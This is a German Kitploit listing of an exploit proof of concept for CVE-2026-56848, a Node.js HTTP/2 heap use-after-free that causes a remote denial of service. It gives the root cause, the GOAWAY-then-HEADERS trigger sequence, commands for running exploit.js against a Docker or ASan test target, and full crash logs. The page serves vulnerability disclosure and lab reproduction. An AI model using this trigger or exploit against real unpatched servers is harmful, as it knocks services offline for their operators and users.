Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-56848 — Exploit-PoC für CVE-2026-56848, ein Node.js-HTTP/2-Heap-Use-After-Free, der einen nicht authentifizierten Remote-DoS ermöglicht. Enthält Raw-Socket-Trigger, ASan-Build-Anweisungen und ein Docker-basiertes Ziel. | Kitploit
Tools/GitHubGitHub/open-flaw/cve-2026-56848
SchwachstellenanalyseDynamische Code-Analyse (DAST)ExploitationWebsicherheitNetzwerksicherheit
GitHubopen-flaw/cve-2026-56848

CVE-2026-56848

Exploit-PoC für CVE-2026-56848, ein Node.js-HTTP/2-Heap-Use-After-Free, der einen nicht authentifizierten Remote-DoS ermöglicht. Enthält Raw-Socket-Trigger, ASan-Build-Anweisungen und ein Docker-basiertes Ziel.

Repository anzeigen
vor 1 TagNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-56848

NVD-Beschreibung

Ein Fehler in der HTTP/2-Verarbeitung von Node.js ermöglicht es, nghttp2_session_mem_send() reentrant aufzurufen, während nghttp2_session_mem_recv() ausgeführt wird, was zu einem Heap-Use-after-Free führt.

Diese Schwachstelle betrifft Node.js 26.x, 24.x und 22.x.

(Hinweis: Die in der Beschreibung genannten Versionen gelten nur für das Upstream-Nodejs-Paket und nicht für das von Alpine vertriebene Nodejs-Paket.

Release-LinieVerwundbarBehoben
22.x (LTS)≤ 22.23.122.23.2
24.x (LTS)≤ 24.18.024.18.1
26.x≤ 26.5.026.5.1
  • Schweregrad: Hoch (CVSS 7.5, AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H — Remote, nicht authentifizierter DoS durch Heap-Korruption)
  • Gemeldet von: hahahkim (HackerOne #3833629)
  • Behoben von: Matteo Collina (mcollina)
  • Fix-Commit (v22): daa6d25e3dce — "http2: defer rst stream while in scope" (nodejs-private/node-private#921)
  • Offengelegt: Node.js-Sicherheitsreleases, 2026-07-29

Grundursache

Http2Stream::SubmitRstStream() in src/node_http2.cc erzwingt eine Bereinigung ausstehender ausgehender Daten, bevor der RST_STREAM in die Warteschlange gestellt wird:```cpp void Http2Stream::SubmitRstStream(const uint32_t code) { CHECK(!this->is_destroyed()); code_ = code;

// (NGHTTP2_CANCEL is deferred — fix for an older double-free) if (session_->is_in_scope() && is_stream_cancel(code)) { session_->AddPendingRstStream(id_); return; }

// If possible, force a purge of any currently pending data here to make // sure it is sent before closing the stream. ... if (session_->SendPendingData() != 0) { // ← RE-ENTRANT mem_send() session_->AddPendingRstStream(id_); return; }

FlushRstStream(); }

root@kitploit:~
`SendPendingData()` ruft `nghttp2_session_mem_send()` auf ([node_http2.cc:1970](https://github.com/nodejs/node/blob/v22.23.1/src/node_http2.cc#L1970)). Der einzige Reentranzschutz ist `is_sending()`, der gegen *Senden-während-Senden* (einen bereits laufenden Schreibvorgang) schützt — **nicht gegen Senden-während-Empfangen**. Wenn `SubmitRstStream()` aus einer `nghttp2_session_mem_recv()`-Callbackkette heraus ausgeführt wird („im Gültigkeitsbereich“), führt die Bereinigung `mem_send()` reentrant aus.

Das reentrante `mem_send()` spült Frames aus, deren sendeseitige Verarbeitung Streams abbaut (`nghttp2_session_close_stream_on_goaway()` → `on_stream_close` → `Http2Stream::Destroy()` → Freigabe des C++-`Http2Stream`). Der freigegebene Stream wird von der laufenden Empfangsoperation weiterhin referenziert: `SubmitRstStream()` selbst läuft auf dem freigegebenen `this` weiter (seine abschließende `FlushRstStream()` liest `is_destroyed()`), und das äußere `mem_recv()` arbeitet weiterhin den Frame-/Header-Zustand des geschlossenen Streams ab → **heap-use-after-free**.

### Trigger-Kette (alles innerhalb eines einzigen `nghttp2_session_mem_recv()`-Aufrufs)

1. Der Angreifer sendet `GOAWAY(lastStreamID=0, NO_ERROR)` unmittelbar gefolgt von `HEADERS`-Frames für neue Streams (3, 5, 7, …) in einem einzigen TCP-Segment.
2. Das `mem_recv()` des Servers verarbeitet GOAWAY → JS `session.close()` → `session.closed = true`, und ein ausgehendes GOAWAY wird **übergeben, aber noch nicht gesendet**.
3. nghttp2 lehnt neue eingehende Streams erst ab, wenn GOAWAY tatsächlich *gesendet* wurde (`session_allow_incoming_new_stream()` prüft `TERM_ON_SEND | SENT`, nicht `SUBMITTED`), daher wird `HEADERS(3)` weiterhin akzeptiert.
4. JS `onSessionHeaders()` erkennt einen neuen Stream auf einer geschlossenen Sitzung und lehnt ihn ab: `handle.rstStream(NGHTTP2_REFUSED_STREAM)` (lib/internal/http2/core.js).
5. C++ `SubmitRstStream(NGHTTP2_REFUSED_STREAM)` läuft im Gültigkeitsbereich (innerhalb von `mem_recv`), `REFUSED_STREAM ≠ CANCEL` → fällt durch zu `SendPendingData()` → **reentrantes `nghttp2_session_mem_send()`**.
6. Der reentrante Sendevorgang sendet das ausgehende GOAWAY aus; die sendeseitige GOAWAY-Verarbeitung von nghttp2 schließt eingehende Streams mit id > 1 (`session_close_stream_on_goaway(..., NGHTTP2_REFUSED_STREAM)`), löst `on_stream_close` aus → `Http2Stream::Destroy()` gibt das C++-Streamobjekt für Stream 3 frei.
7. Die Ausführung kehrt in `SubmitRstStream()` auf dem freigegebenen Objekt zurück (`FlushRstStream()`), und das äußere `mem_recv()` wird auf dem beschädigten Sitzungs-/Stream-Zustand fortgesetzt → UAF.

Beleg von `NODE_DEBUG_NATIVE=http2` auf einem verwundbaren Server (ein einzelner 86-Byte-Lesevorgang):```
receiving 86 bytes, offset 0
complete frame received: type: 7          ← GOAWAY
submitting goaway                          ← GOAWAY submitted, NOT yet sent
beginning headers for stream 3             ← still accepted (only SUBMITTED)
handle headers frame for stream 3          ← JS: session.closed → refuse
sending rst_stream with code 7             ← SubmitRstStream(REFUSED_STREAM), in scope
sending pending data                       ← RE-ENTRANT mem_send()
stream 3 closed with code: 7               ← GOAWAY send closes stream 3
Removing stream: 3 / destroying stream     ← Http2Stream freed mid-recv

Verhaltenssignatur

Die Ausgabe auf Wire-Ebene ist bei verwundbaren und gepatchten Builds identisch (beide senden letztendlich nur das ausgehende GOAWAY — bei verwundbaren Builds wird das RST gegen einen bereits geschlossenen Stream übermittelt, bei gepatchten Builds verwirft nghttp2 die in der Warteschlange befindlichen RSTs, sobald das GOAWAY zuerst gesendet wird). Der Unterschied ist intern und sichtbar mit NODE_DEBUG_NATIVE=http2:

  • Verwundbar: sending pending data erscheint zwischen sending rst_stream with code 7 und stream 3 closed with code: 7 — der reentrante mem_send() läuft mitten im Empfang und schließt/zerstört Stream 3, während mem_recv() noch in Bearbeitung ist (Absturz unter ASan).
  • Gepatcht: kein sending pending data dazwischen — das RST wird lediglich in die Warteschlange gestellt; Stream 3 wird erst während des normalen Flush nach dem Empfang geschlossen.

PoC```

server.js # minimal http2.createServer() target (no handler needed) exploit.js # raw-socket HTTP/2 client that drives the trigger

root@kitploit:~
### Schnellstart```bash
# Terminal 1: the target (any vulnerable node: 22.23.1 / 24.18.0 / 26.5.0 or older in their lines)
node server.js 8000                       # NODE_BIN=/path/to/node for a specific binary

# Terminal 2: the attack — a crash shows up in terminal 1 (ASan report / segfault)
node exploit.js --port 8000 --iterations 200

./bin/node (der lokale ASan-Build, der unten verwendet wird) ist nicht in git versioniert — erstelle ihn mit den Anweisungen unter „Building an ASan-instrumented vulnerable Node.js" oder nutze den Docker-Weg.

Das Exploit meldet den Status pro Verbindung; SKIPPED (no handshake) nach der ersten Verbindung bedeutet, dass das Ziel bereits durch den Angriff gestorben ist.

Docker

Das Dockerfile baut ein verwundbares v22.23.1-Ziel mit ASan in einem Container (keine lokale Toolchain erforderlich — nur der Docker-Daemon):```bash docker build -t cve-2026-56848 . docker run --rm -p 8000:8000 --name cve-target cve-2026-56848

from the host, in another terminal:

you could reuse ./bin/node

node exploit.js --port 8000 --iterations 10

inspect the crash (ASan report) and exit code:

docker logs cve-target docker inspect cve-target --format '{{.State.ExitCode}}' # 133 (ASan abort) = crashed

root@kitploit:~
Tipp: Wenn Sie bereits ein ASan-instrumentiertes `node`-Binärprogramm woanders erstellt haben, überspringen Sie die
lange Kompilierung und paketieren Sie es direkt:```bash
docker run --name cve-img -v /path/to/out/Release:/opt/node debian:bookworm-slim \
  bash -c 'apt-get update -qq && apt-get install -y -qq libstdc++6 libatomic1 \
    && cp /opt/node/node /usr/local/bin/node-asan && mkdir -p /app'
docker cp server.js cve-img:/app/server.js
docker commit --change 'WORKDIR /app' --change 'EXPOSE 8000' \
  --change 'ENV HOST=0.0.0.0' --change 'ENV ASAN_OPTIONS=detect_leaks=0:abort_on_error=1' \
  --change 'ENTRYPOINT ["/usr/local/bin/node-asan"]' --change 'CMD ["server.js", "8000"]' \
  cve-img cve-2026-56848:verified

Verified against the containerized target: the first attack connection produces ERROR: AddressSanitizer: heap-use-after-free ... ABORTING in docker logs and the container exits (133 on linux/arm64) — same UAF as the native ASan run.

Plain (non-ASan) variant using an official image, for hammering without a custom build:```bash docker run --rm -p 8000:8000 -e HOST=0.0.0.0 -v "$PWD/server.js":/server.js
node:22.23.1-alpine node /server.js 8000

root@kitploit:~
Hinweis: Falls ASan im Container mit einem Fehler im Shadow-Memory-Bereich nicht startet (auf einigen ARM64-Kerneln mit hohem `vm.mmap_rnd_bits` zu beobachten), senken Sie die Entropie auf dem Docker-Host: `sysctl vm.mmap_rnd_bits=28`.

### Erstellen eines ASan-instrumentierten, verwundbaren Node.js```bash
# Linux (officially supported):
git clone --depth 1 --branch v22.23.1 https://github.com/nodejs/node
cd node && ./configure --debug --enable-asan && make -j$(nproc)

# macOS (unofficial but works with clang):
git clone --depth 1 --branch v22.23.1 https://github.com/nodejs/node
cd node && CC=clang CXX=clang++ \
  CFLAGS="-fsanitize=address -fno-omit-frame-pointer" \
  CXXFLAGS="-fsanitize=address -fno-omit-frame-pointer" \
  LDFLAGS="-fsanitize=address" \
  ./configure --debug --ninja && ninja -C out/Debug node

Der ASan-Build reproduziert den Heap-use-after-free deterministisch (typischerweise bei den ersten paar Verbindungen). Normale Release-Builds stürzen normalerweise nicht ab, weil der freigegebene Speicherblock nicht sofort wiederverwendet wird; intensives Belasten erhöht die Chancen, aber ASan ist der zuverlässige Weg, die Korruption nachzuweisen.

Verifizierte Ergebnisse

ZielErgebnis
v22.23.1 + ASan (verwundbar)Stürzt bei der ersten Angriffsverbindung ab: heap-use-after-free → SIGABRT, runner exit 0
v22.23.2 (gepatcht)Übersteht alle Verbindungen, runner exit 1

ASan-Bericht (Auszug, v22.23.1 macOS arm64 Build):``` ERROR: AddressSanitizer: heap-use-after-free ... READ of size 1 at 0x60d000003cdc thread T0 #0 session_end_stream_headers_received nghttp2_session.c:3711 #1 session_after_header_block_received nghttp2_session.c:3824 #2 nghttp2_session_mem_recv2 nghttp2_session.c:6506 #3 nghttp2_session_mem_recv nghttp2_session.c:5421 #4 node::http2::Http2Session::ConsumeHTTP2Data() node_http2.cc:959

freed by thread T0 here: ... #5 nghttp2_session_destroy_stream nghttp2_session.c:1369 #6 nghttp2_session_close_stream nghttp2_session.c:1350 #7 session_close_stream_on_goaway nghttp2_session.c:2442 #8 session_after_frame_sent1 nghttp2_session.c:2665 #9 nghttp2_session_mem_send2 nghttp2_session.c:3144 ← re-entrant send #10 node::http2::Http2Session::SendPendingData() node_http2.cc:1970 #11 node::http2::Http2Stream::SubmitRstStream(...) node_http2.cc:2535

root@kitploit:~
Die äußere `mem_recv()` liest `stream->shut_flags` aus dem `nghttp2_stream` von Stream 3 — freigegeben durch die GOAWAY-Verarbeitung des re-entranten `mem_send()` — genau die im Advisory beschriebene Re-Entrancy.```zsh
➜ ./bin/node  server.js 8000
[server] listening on 8000
=================================================================
==46874==ERROR: AddressSanitizer: heap-use-after-free on address 0x60d000003cdc at pc 0x00010984c5fc bp 0x00016b3e8c60 sp 0x00016b3e8c58
READ of size 1 at 0x60d000003cdc thread T0
    #0 0x00010984c5f8 in session_end_stream_headers_received nghttp2_session.c:3711
    #1 0x00010983e7d8 in session_after_header_block_received nghttp2_session.c:3824
    #2 0x000109838518 in nghttp2_session_mem_recv2 nghttp2_session.c:6506
    #3 0x000109832824 in nghttp2_session_mem_recv nghttp2_session.c:5421
    #4 0x0001050a1a20 in node::http2::Http2Session::ConsumeHTTP2Data() node_http2.cc:959
    #5 0x0001050ad564 in node::http2::Http2Session::OnStreamRead(long, uv_buf_t const&) node_http2.cc:2194
    #6 0x000104dda218 in node::StreamResource::EmitRead(long, uv_buf_t const&) stream_base-inl.h:79
    #7 0x000105544d1c in node::LibuvStreamWrap::OnUvRead(long, uv_buf_t const*) stream_wrap.cc:292
    #8 0x000105547be4 in node::LibuvStreamWrap::ReadStart()::$_1::operator()(uv_stream_s*, long, uv_buf_t const*) const stream_wrap.cc:212
    #9 0x0001055479bc in node::LibuvStreamWrap::ReadStart()::$_1::__invoke(uv_stream_s*, long, uv_buf_t const*) stream_wrap.cc:208
    #10 0x0001085e025c in uv__read stream.c:1148
    #11 0x0001085d5568 in uv__stream_io stream.c:1208
    #12 0x000108600844 in uv__io_poll kqueue.c:423
    #13 0x000108599e94 in uv_run core.c:460
    #14 0x000104afc710 in node::SpinEventLoopInternal(node::Environment*) embed_helpers.cc:41
    #15 0x000105134040 in node::NodeMainInstance::Run(node::ExitCode*, node::Environment*) node_main_instance.cc:111
    #16 0x000105133564 in node::NodeMainInstance::Run() node_main_instance.cc:100
    #17 0x000104e74864 in node::StartInternal(int, char**) node.cc:1630
    #18 0x000104e73ed8 in node::Start(int, char**) node.cc:1637
    #19 0x00010928e3d4 in main node_main.cc:97
    #20 0x000189482b94  (<unknown module>)

0x60d000003cdc is located 124 bytes inside of 136-byte region [0x60d000003c60,0x60d000003ce8)
freed by thread T0 here:
    #0 0x000117991424 in free+0x7c (libclang_rt.asan_osx_dynamic.dylib:arm64e+0x3d424)
    #1 0x000104bebe3c in char* node::UncheckedRealloc<char>(char*, unsigned long) util-inl.h:261
    #2 0x000105112128 in node::mem::NgLibMemoryManager<node::http2::Http2Session, nghttp2_mem>::ReallocImpl(void*, unsigned long, void*) node_mem-inl.h:53
    #3 0x000105111f80 in node::mem::NgLibMemoryManager<node::http2::Http2Session, nghttp2_mem>::FreeImpl(void*, void*) node_mem-inl.h:83
    #4 0x00010981a450 in nghttp2_mem_free nghttp2_mem.c:61
    #5 0x000109825aa8 in nghttp2_session_destroy_stream nghttp2_session.c:1369
    #6 0x0001098258ac in nghttp2_session_close_stream nghttp2_session.c:1350
    #7 0x00010983002c in session_close_stream_on_goaway nghttp2_session.c:2442
    #8 0x000109828e64 in session_after_frame_sent1 nghttp2_session.c:2665
    #9 0x000109826804 in nghttp2_session_mem_send2 nghttp2_session.c:3144
    #10 0x000109826724 in nghttp2_session_mem_send nghttp2_session.c:3124
    #11 0x00010509e878 in node::http2::Http2Session::SendPendingData() node_http2.cc:1970
    #12 0x0001050a359c in node::http2::Http2Stream::SubmitRstStream(unsigned int) node_http2.cc:2535
    #13 0x0001050b973c in node::http2::Http2Stream::RstStream(v8::FunctionCallbackInfo<v8::Value> const&) node_http2.cc:3044
    #14 0x0001086163d4 in Builtins_CallApiCallbackGeneric+0xb4 (node:arm64+0x103c0e3d4)
    #15 0x00010861432c in Builtins_InterpreterEntryTrampoline+0x10c (node:arm64+0x103c0c32c)
    #16 0x0001086117c8 in Builtins_JSEntryTrampoline+0xa8 (node:arm64+0x103c097c8)
    #17 0x0001086114b0 in Builtins_JSEntry+0x90 (node:arm64+0x103c094b0)
    #18 0x000105ff5358 in v8::internal::(anonymous namespace)::Invoke(v8::internal::Isolate*, v8::internal::(anonymous namespace)::InvokeParams const&) execution.cc:418
    #19 0x000105ff408c in v8::internal::Execution::Call(v8::internal::Isolate*, v8::internal::Handle<v8::internal::Object>, v8::internal::Handle<v8::internal::Object>, int, v8::internal::Handle<v8::internal::Object>*) execution.cc:504
    #20 0x00010590caac in v8::Function::Call(v8::Local<v8::Context>, v8::Local<v8::Value>, int, v8::Local<v8::Value>*) api.cc:5485
    #21 0x000104af5168 in node::InternalMakeCallback(node::Environment*, v8::Local<v8::Object>, v8::Local<v8::Object>, v8::Local<v8::Function>, int, v8::Local<v8::Value>*, node::async_context, v8::Local<v8::Value>) callback.cc:237
    #22 0x000104b69780 in node::AsyncWrap::MakeCallback(v8::Local<v8::Function>, int, v8::Local<v8::Value>*) async_wrap.cc:665
    #23 0x0001050a463c in node::http2::Http2Session::HandleHeadersFrame(nghttp2_frame const*) node_http2.cc:1567
    #24 0x000105092e68 in node::http2::Http2Session::OnFrameReceive(nghttp2_session*, nghttp2_frame const*, void*) node_http2.cc:1107
    #25 0x00010982b5b0 in session_call_on_frame_received nghttp2_session.c:3229
    #26 0x00010983e72c in session_after_header_block_received nghttp2_session.c:3815
    #27 0x000109838518 in nghttp2_session_mem_recv2 nghttp2_session.c:6506
    #28 0x000109832824 in nghttp2_session_mem_recv nghttp2_session.c:5421
    #29 0x0001050a1a20 in node::http2::Http2Session::ConsumeHTTP2Data() node_http2.cc:959

previously allocated by thread T0 here:
    #0 0x000117991520 in realloc+0x80 (libclang_rt.asan_osx_dynamic.dylib:arm64e+0x3d520)
    #1 0x000104bebe58 in char* node::UncheckedRealloc<char>(char*, unsigned long) util-inl.h:265
    #2 0x000105112128 in node::mem::NgLibMemoryManager<node::http2::Http2Session, nghttp2_mem>::ReallocImpl(void*, unsigned long, void*) node_mem-inl.h:53
    #3 0x000105111f3c in node::mem::NgLibMemoryManager<node::http2::Http2Session, nghttp2_mem>::MallocImpl(unsigned long, void*) node_mem-inl.h:77
    #4 0x00010981a3a0 in nghttp2_mem_malloc nghttp2_mem.c:57
    #5 0x000109824728 in nghttp2_session_open_stream nghttp2_session.c:1227
    #6 0x000109829ee8 in nghttp2_session_on_request_headers_received nghttp2_session.c:3910
    #7 0x00010983c454 in session_process_headers_frame nghttp2_session.c:4058
    #8 0x000109833ad4 in nghttp2_session_mem_recv2 nghttp2_session.c:5657
    #9 0x000109832824 in nghttp2_session_mem_recv nghttp2_session.c:5421
    #10 0x0001050a1a20 in node::http2::Http2Session::ConsumeHTTP2Data() node_http2.cc:959
    #11 0x0001050ad564 in node::http2::Http2Session::OnStreamRead(long, uv_buf_t const&) node_http2.cc:2194
    #12 0x000104dda218 in node::StreamResource::EmitRead(long, uv_buf_t const&) stream_base-inl.h:79
    #13 0x000105544d1c in node::LibuvStreamWrap::OnUvRead(long, uv_buf_t const*) stream_wrap.cc:292
    #14 0x000105547be4 in node::LibuvStreamWrap::ReadStart()::$_1::operator()(uv_stream_s*, long, uv_buf_t const*) const stream_wrap.cc:212
    #15 0x0001055479bc in node::LibuvStreamWrap::ReadStart()::$_1::__invoke(uv_stream_s*, long, uv_buf_t const*) stream_wrap.cc:208
    #16 0x0001085e025c in uv__read stream.c:1148
    #17 0x0001085d5568 in uv__stream_io stream.c:1208
    #18 0x000108600844 in uv__io_poll kqueue.c:423
    #19 0x000108599e94 in uv_run core.c:460
    #20 0x000104afc710 in node::SpinEventLoopInternal(node::Environment*) embed_helpers.cc:41
    #21 0x000105134040 in node::NodeMainInstance::Run(node::ExitCode*, node::Environment*) node_main_instance.cc:111
    #22 0x000105133564 in node::NodeMainInstance::Run() node_main_instance.cc:100
    #23 0x000104e74864 in node::StartInternal(int, char**) node.cc:1630
    #24 0x000104e73ed8 in node::Start(int, char**) node.cc:1637
    #25 0x00010928e3d4 in main node_main.cc:97
    #26 0x000189482b94  (<unknown module>)

SUMMARY: AddressSanitizer: heap-use-after-free nghttp2_session.c:3711 in session_end_stream_headers_received
Shadow bytes around the buggy address:
  0x60d000003a00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x60d000003a80: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x60d000003b00: fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa
  0x60d000003b80: fa fa 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x60d000003c00: 00 00 00 fa fa fa fa fa fa fa fa fa fd fd fd fd
=>0x60d000003c80: fd fd fd fd fd fd fd fd fd fd fd[fd]fd fa fa fa
  0x60d000003d00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x60d000003d80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x60d000003e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x60d000003e80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x60d000003f00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==46874==ABORTING
[1]    46874 abort      ./bin/node server.js 8000

Referenzen

  • Node.js-Sicherheitsversionen — 29. Juli 2026
  • Fix commit (v22.23.2): http2: defer rst stream while in scope
  • Regressionstest: test-http2-rst-stream-reentrancy.js
  • nodejs-private/node-private#921
  • HackerOne-Bericht 3833629 (noch nicht öffentlich)
  • CVE-2026-56848 — IONIX threat center
  • Red Hat-CVE-Seite
Tool herunterladen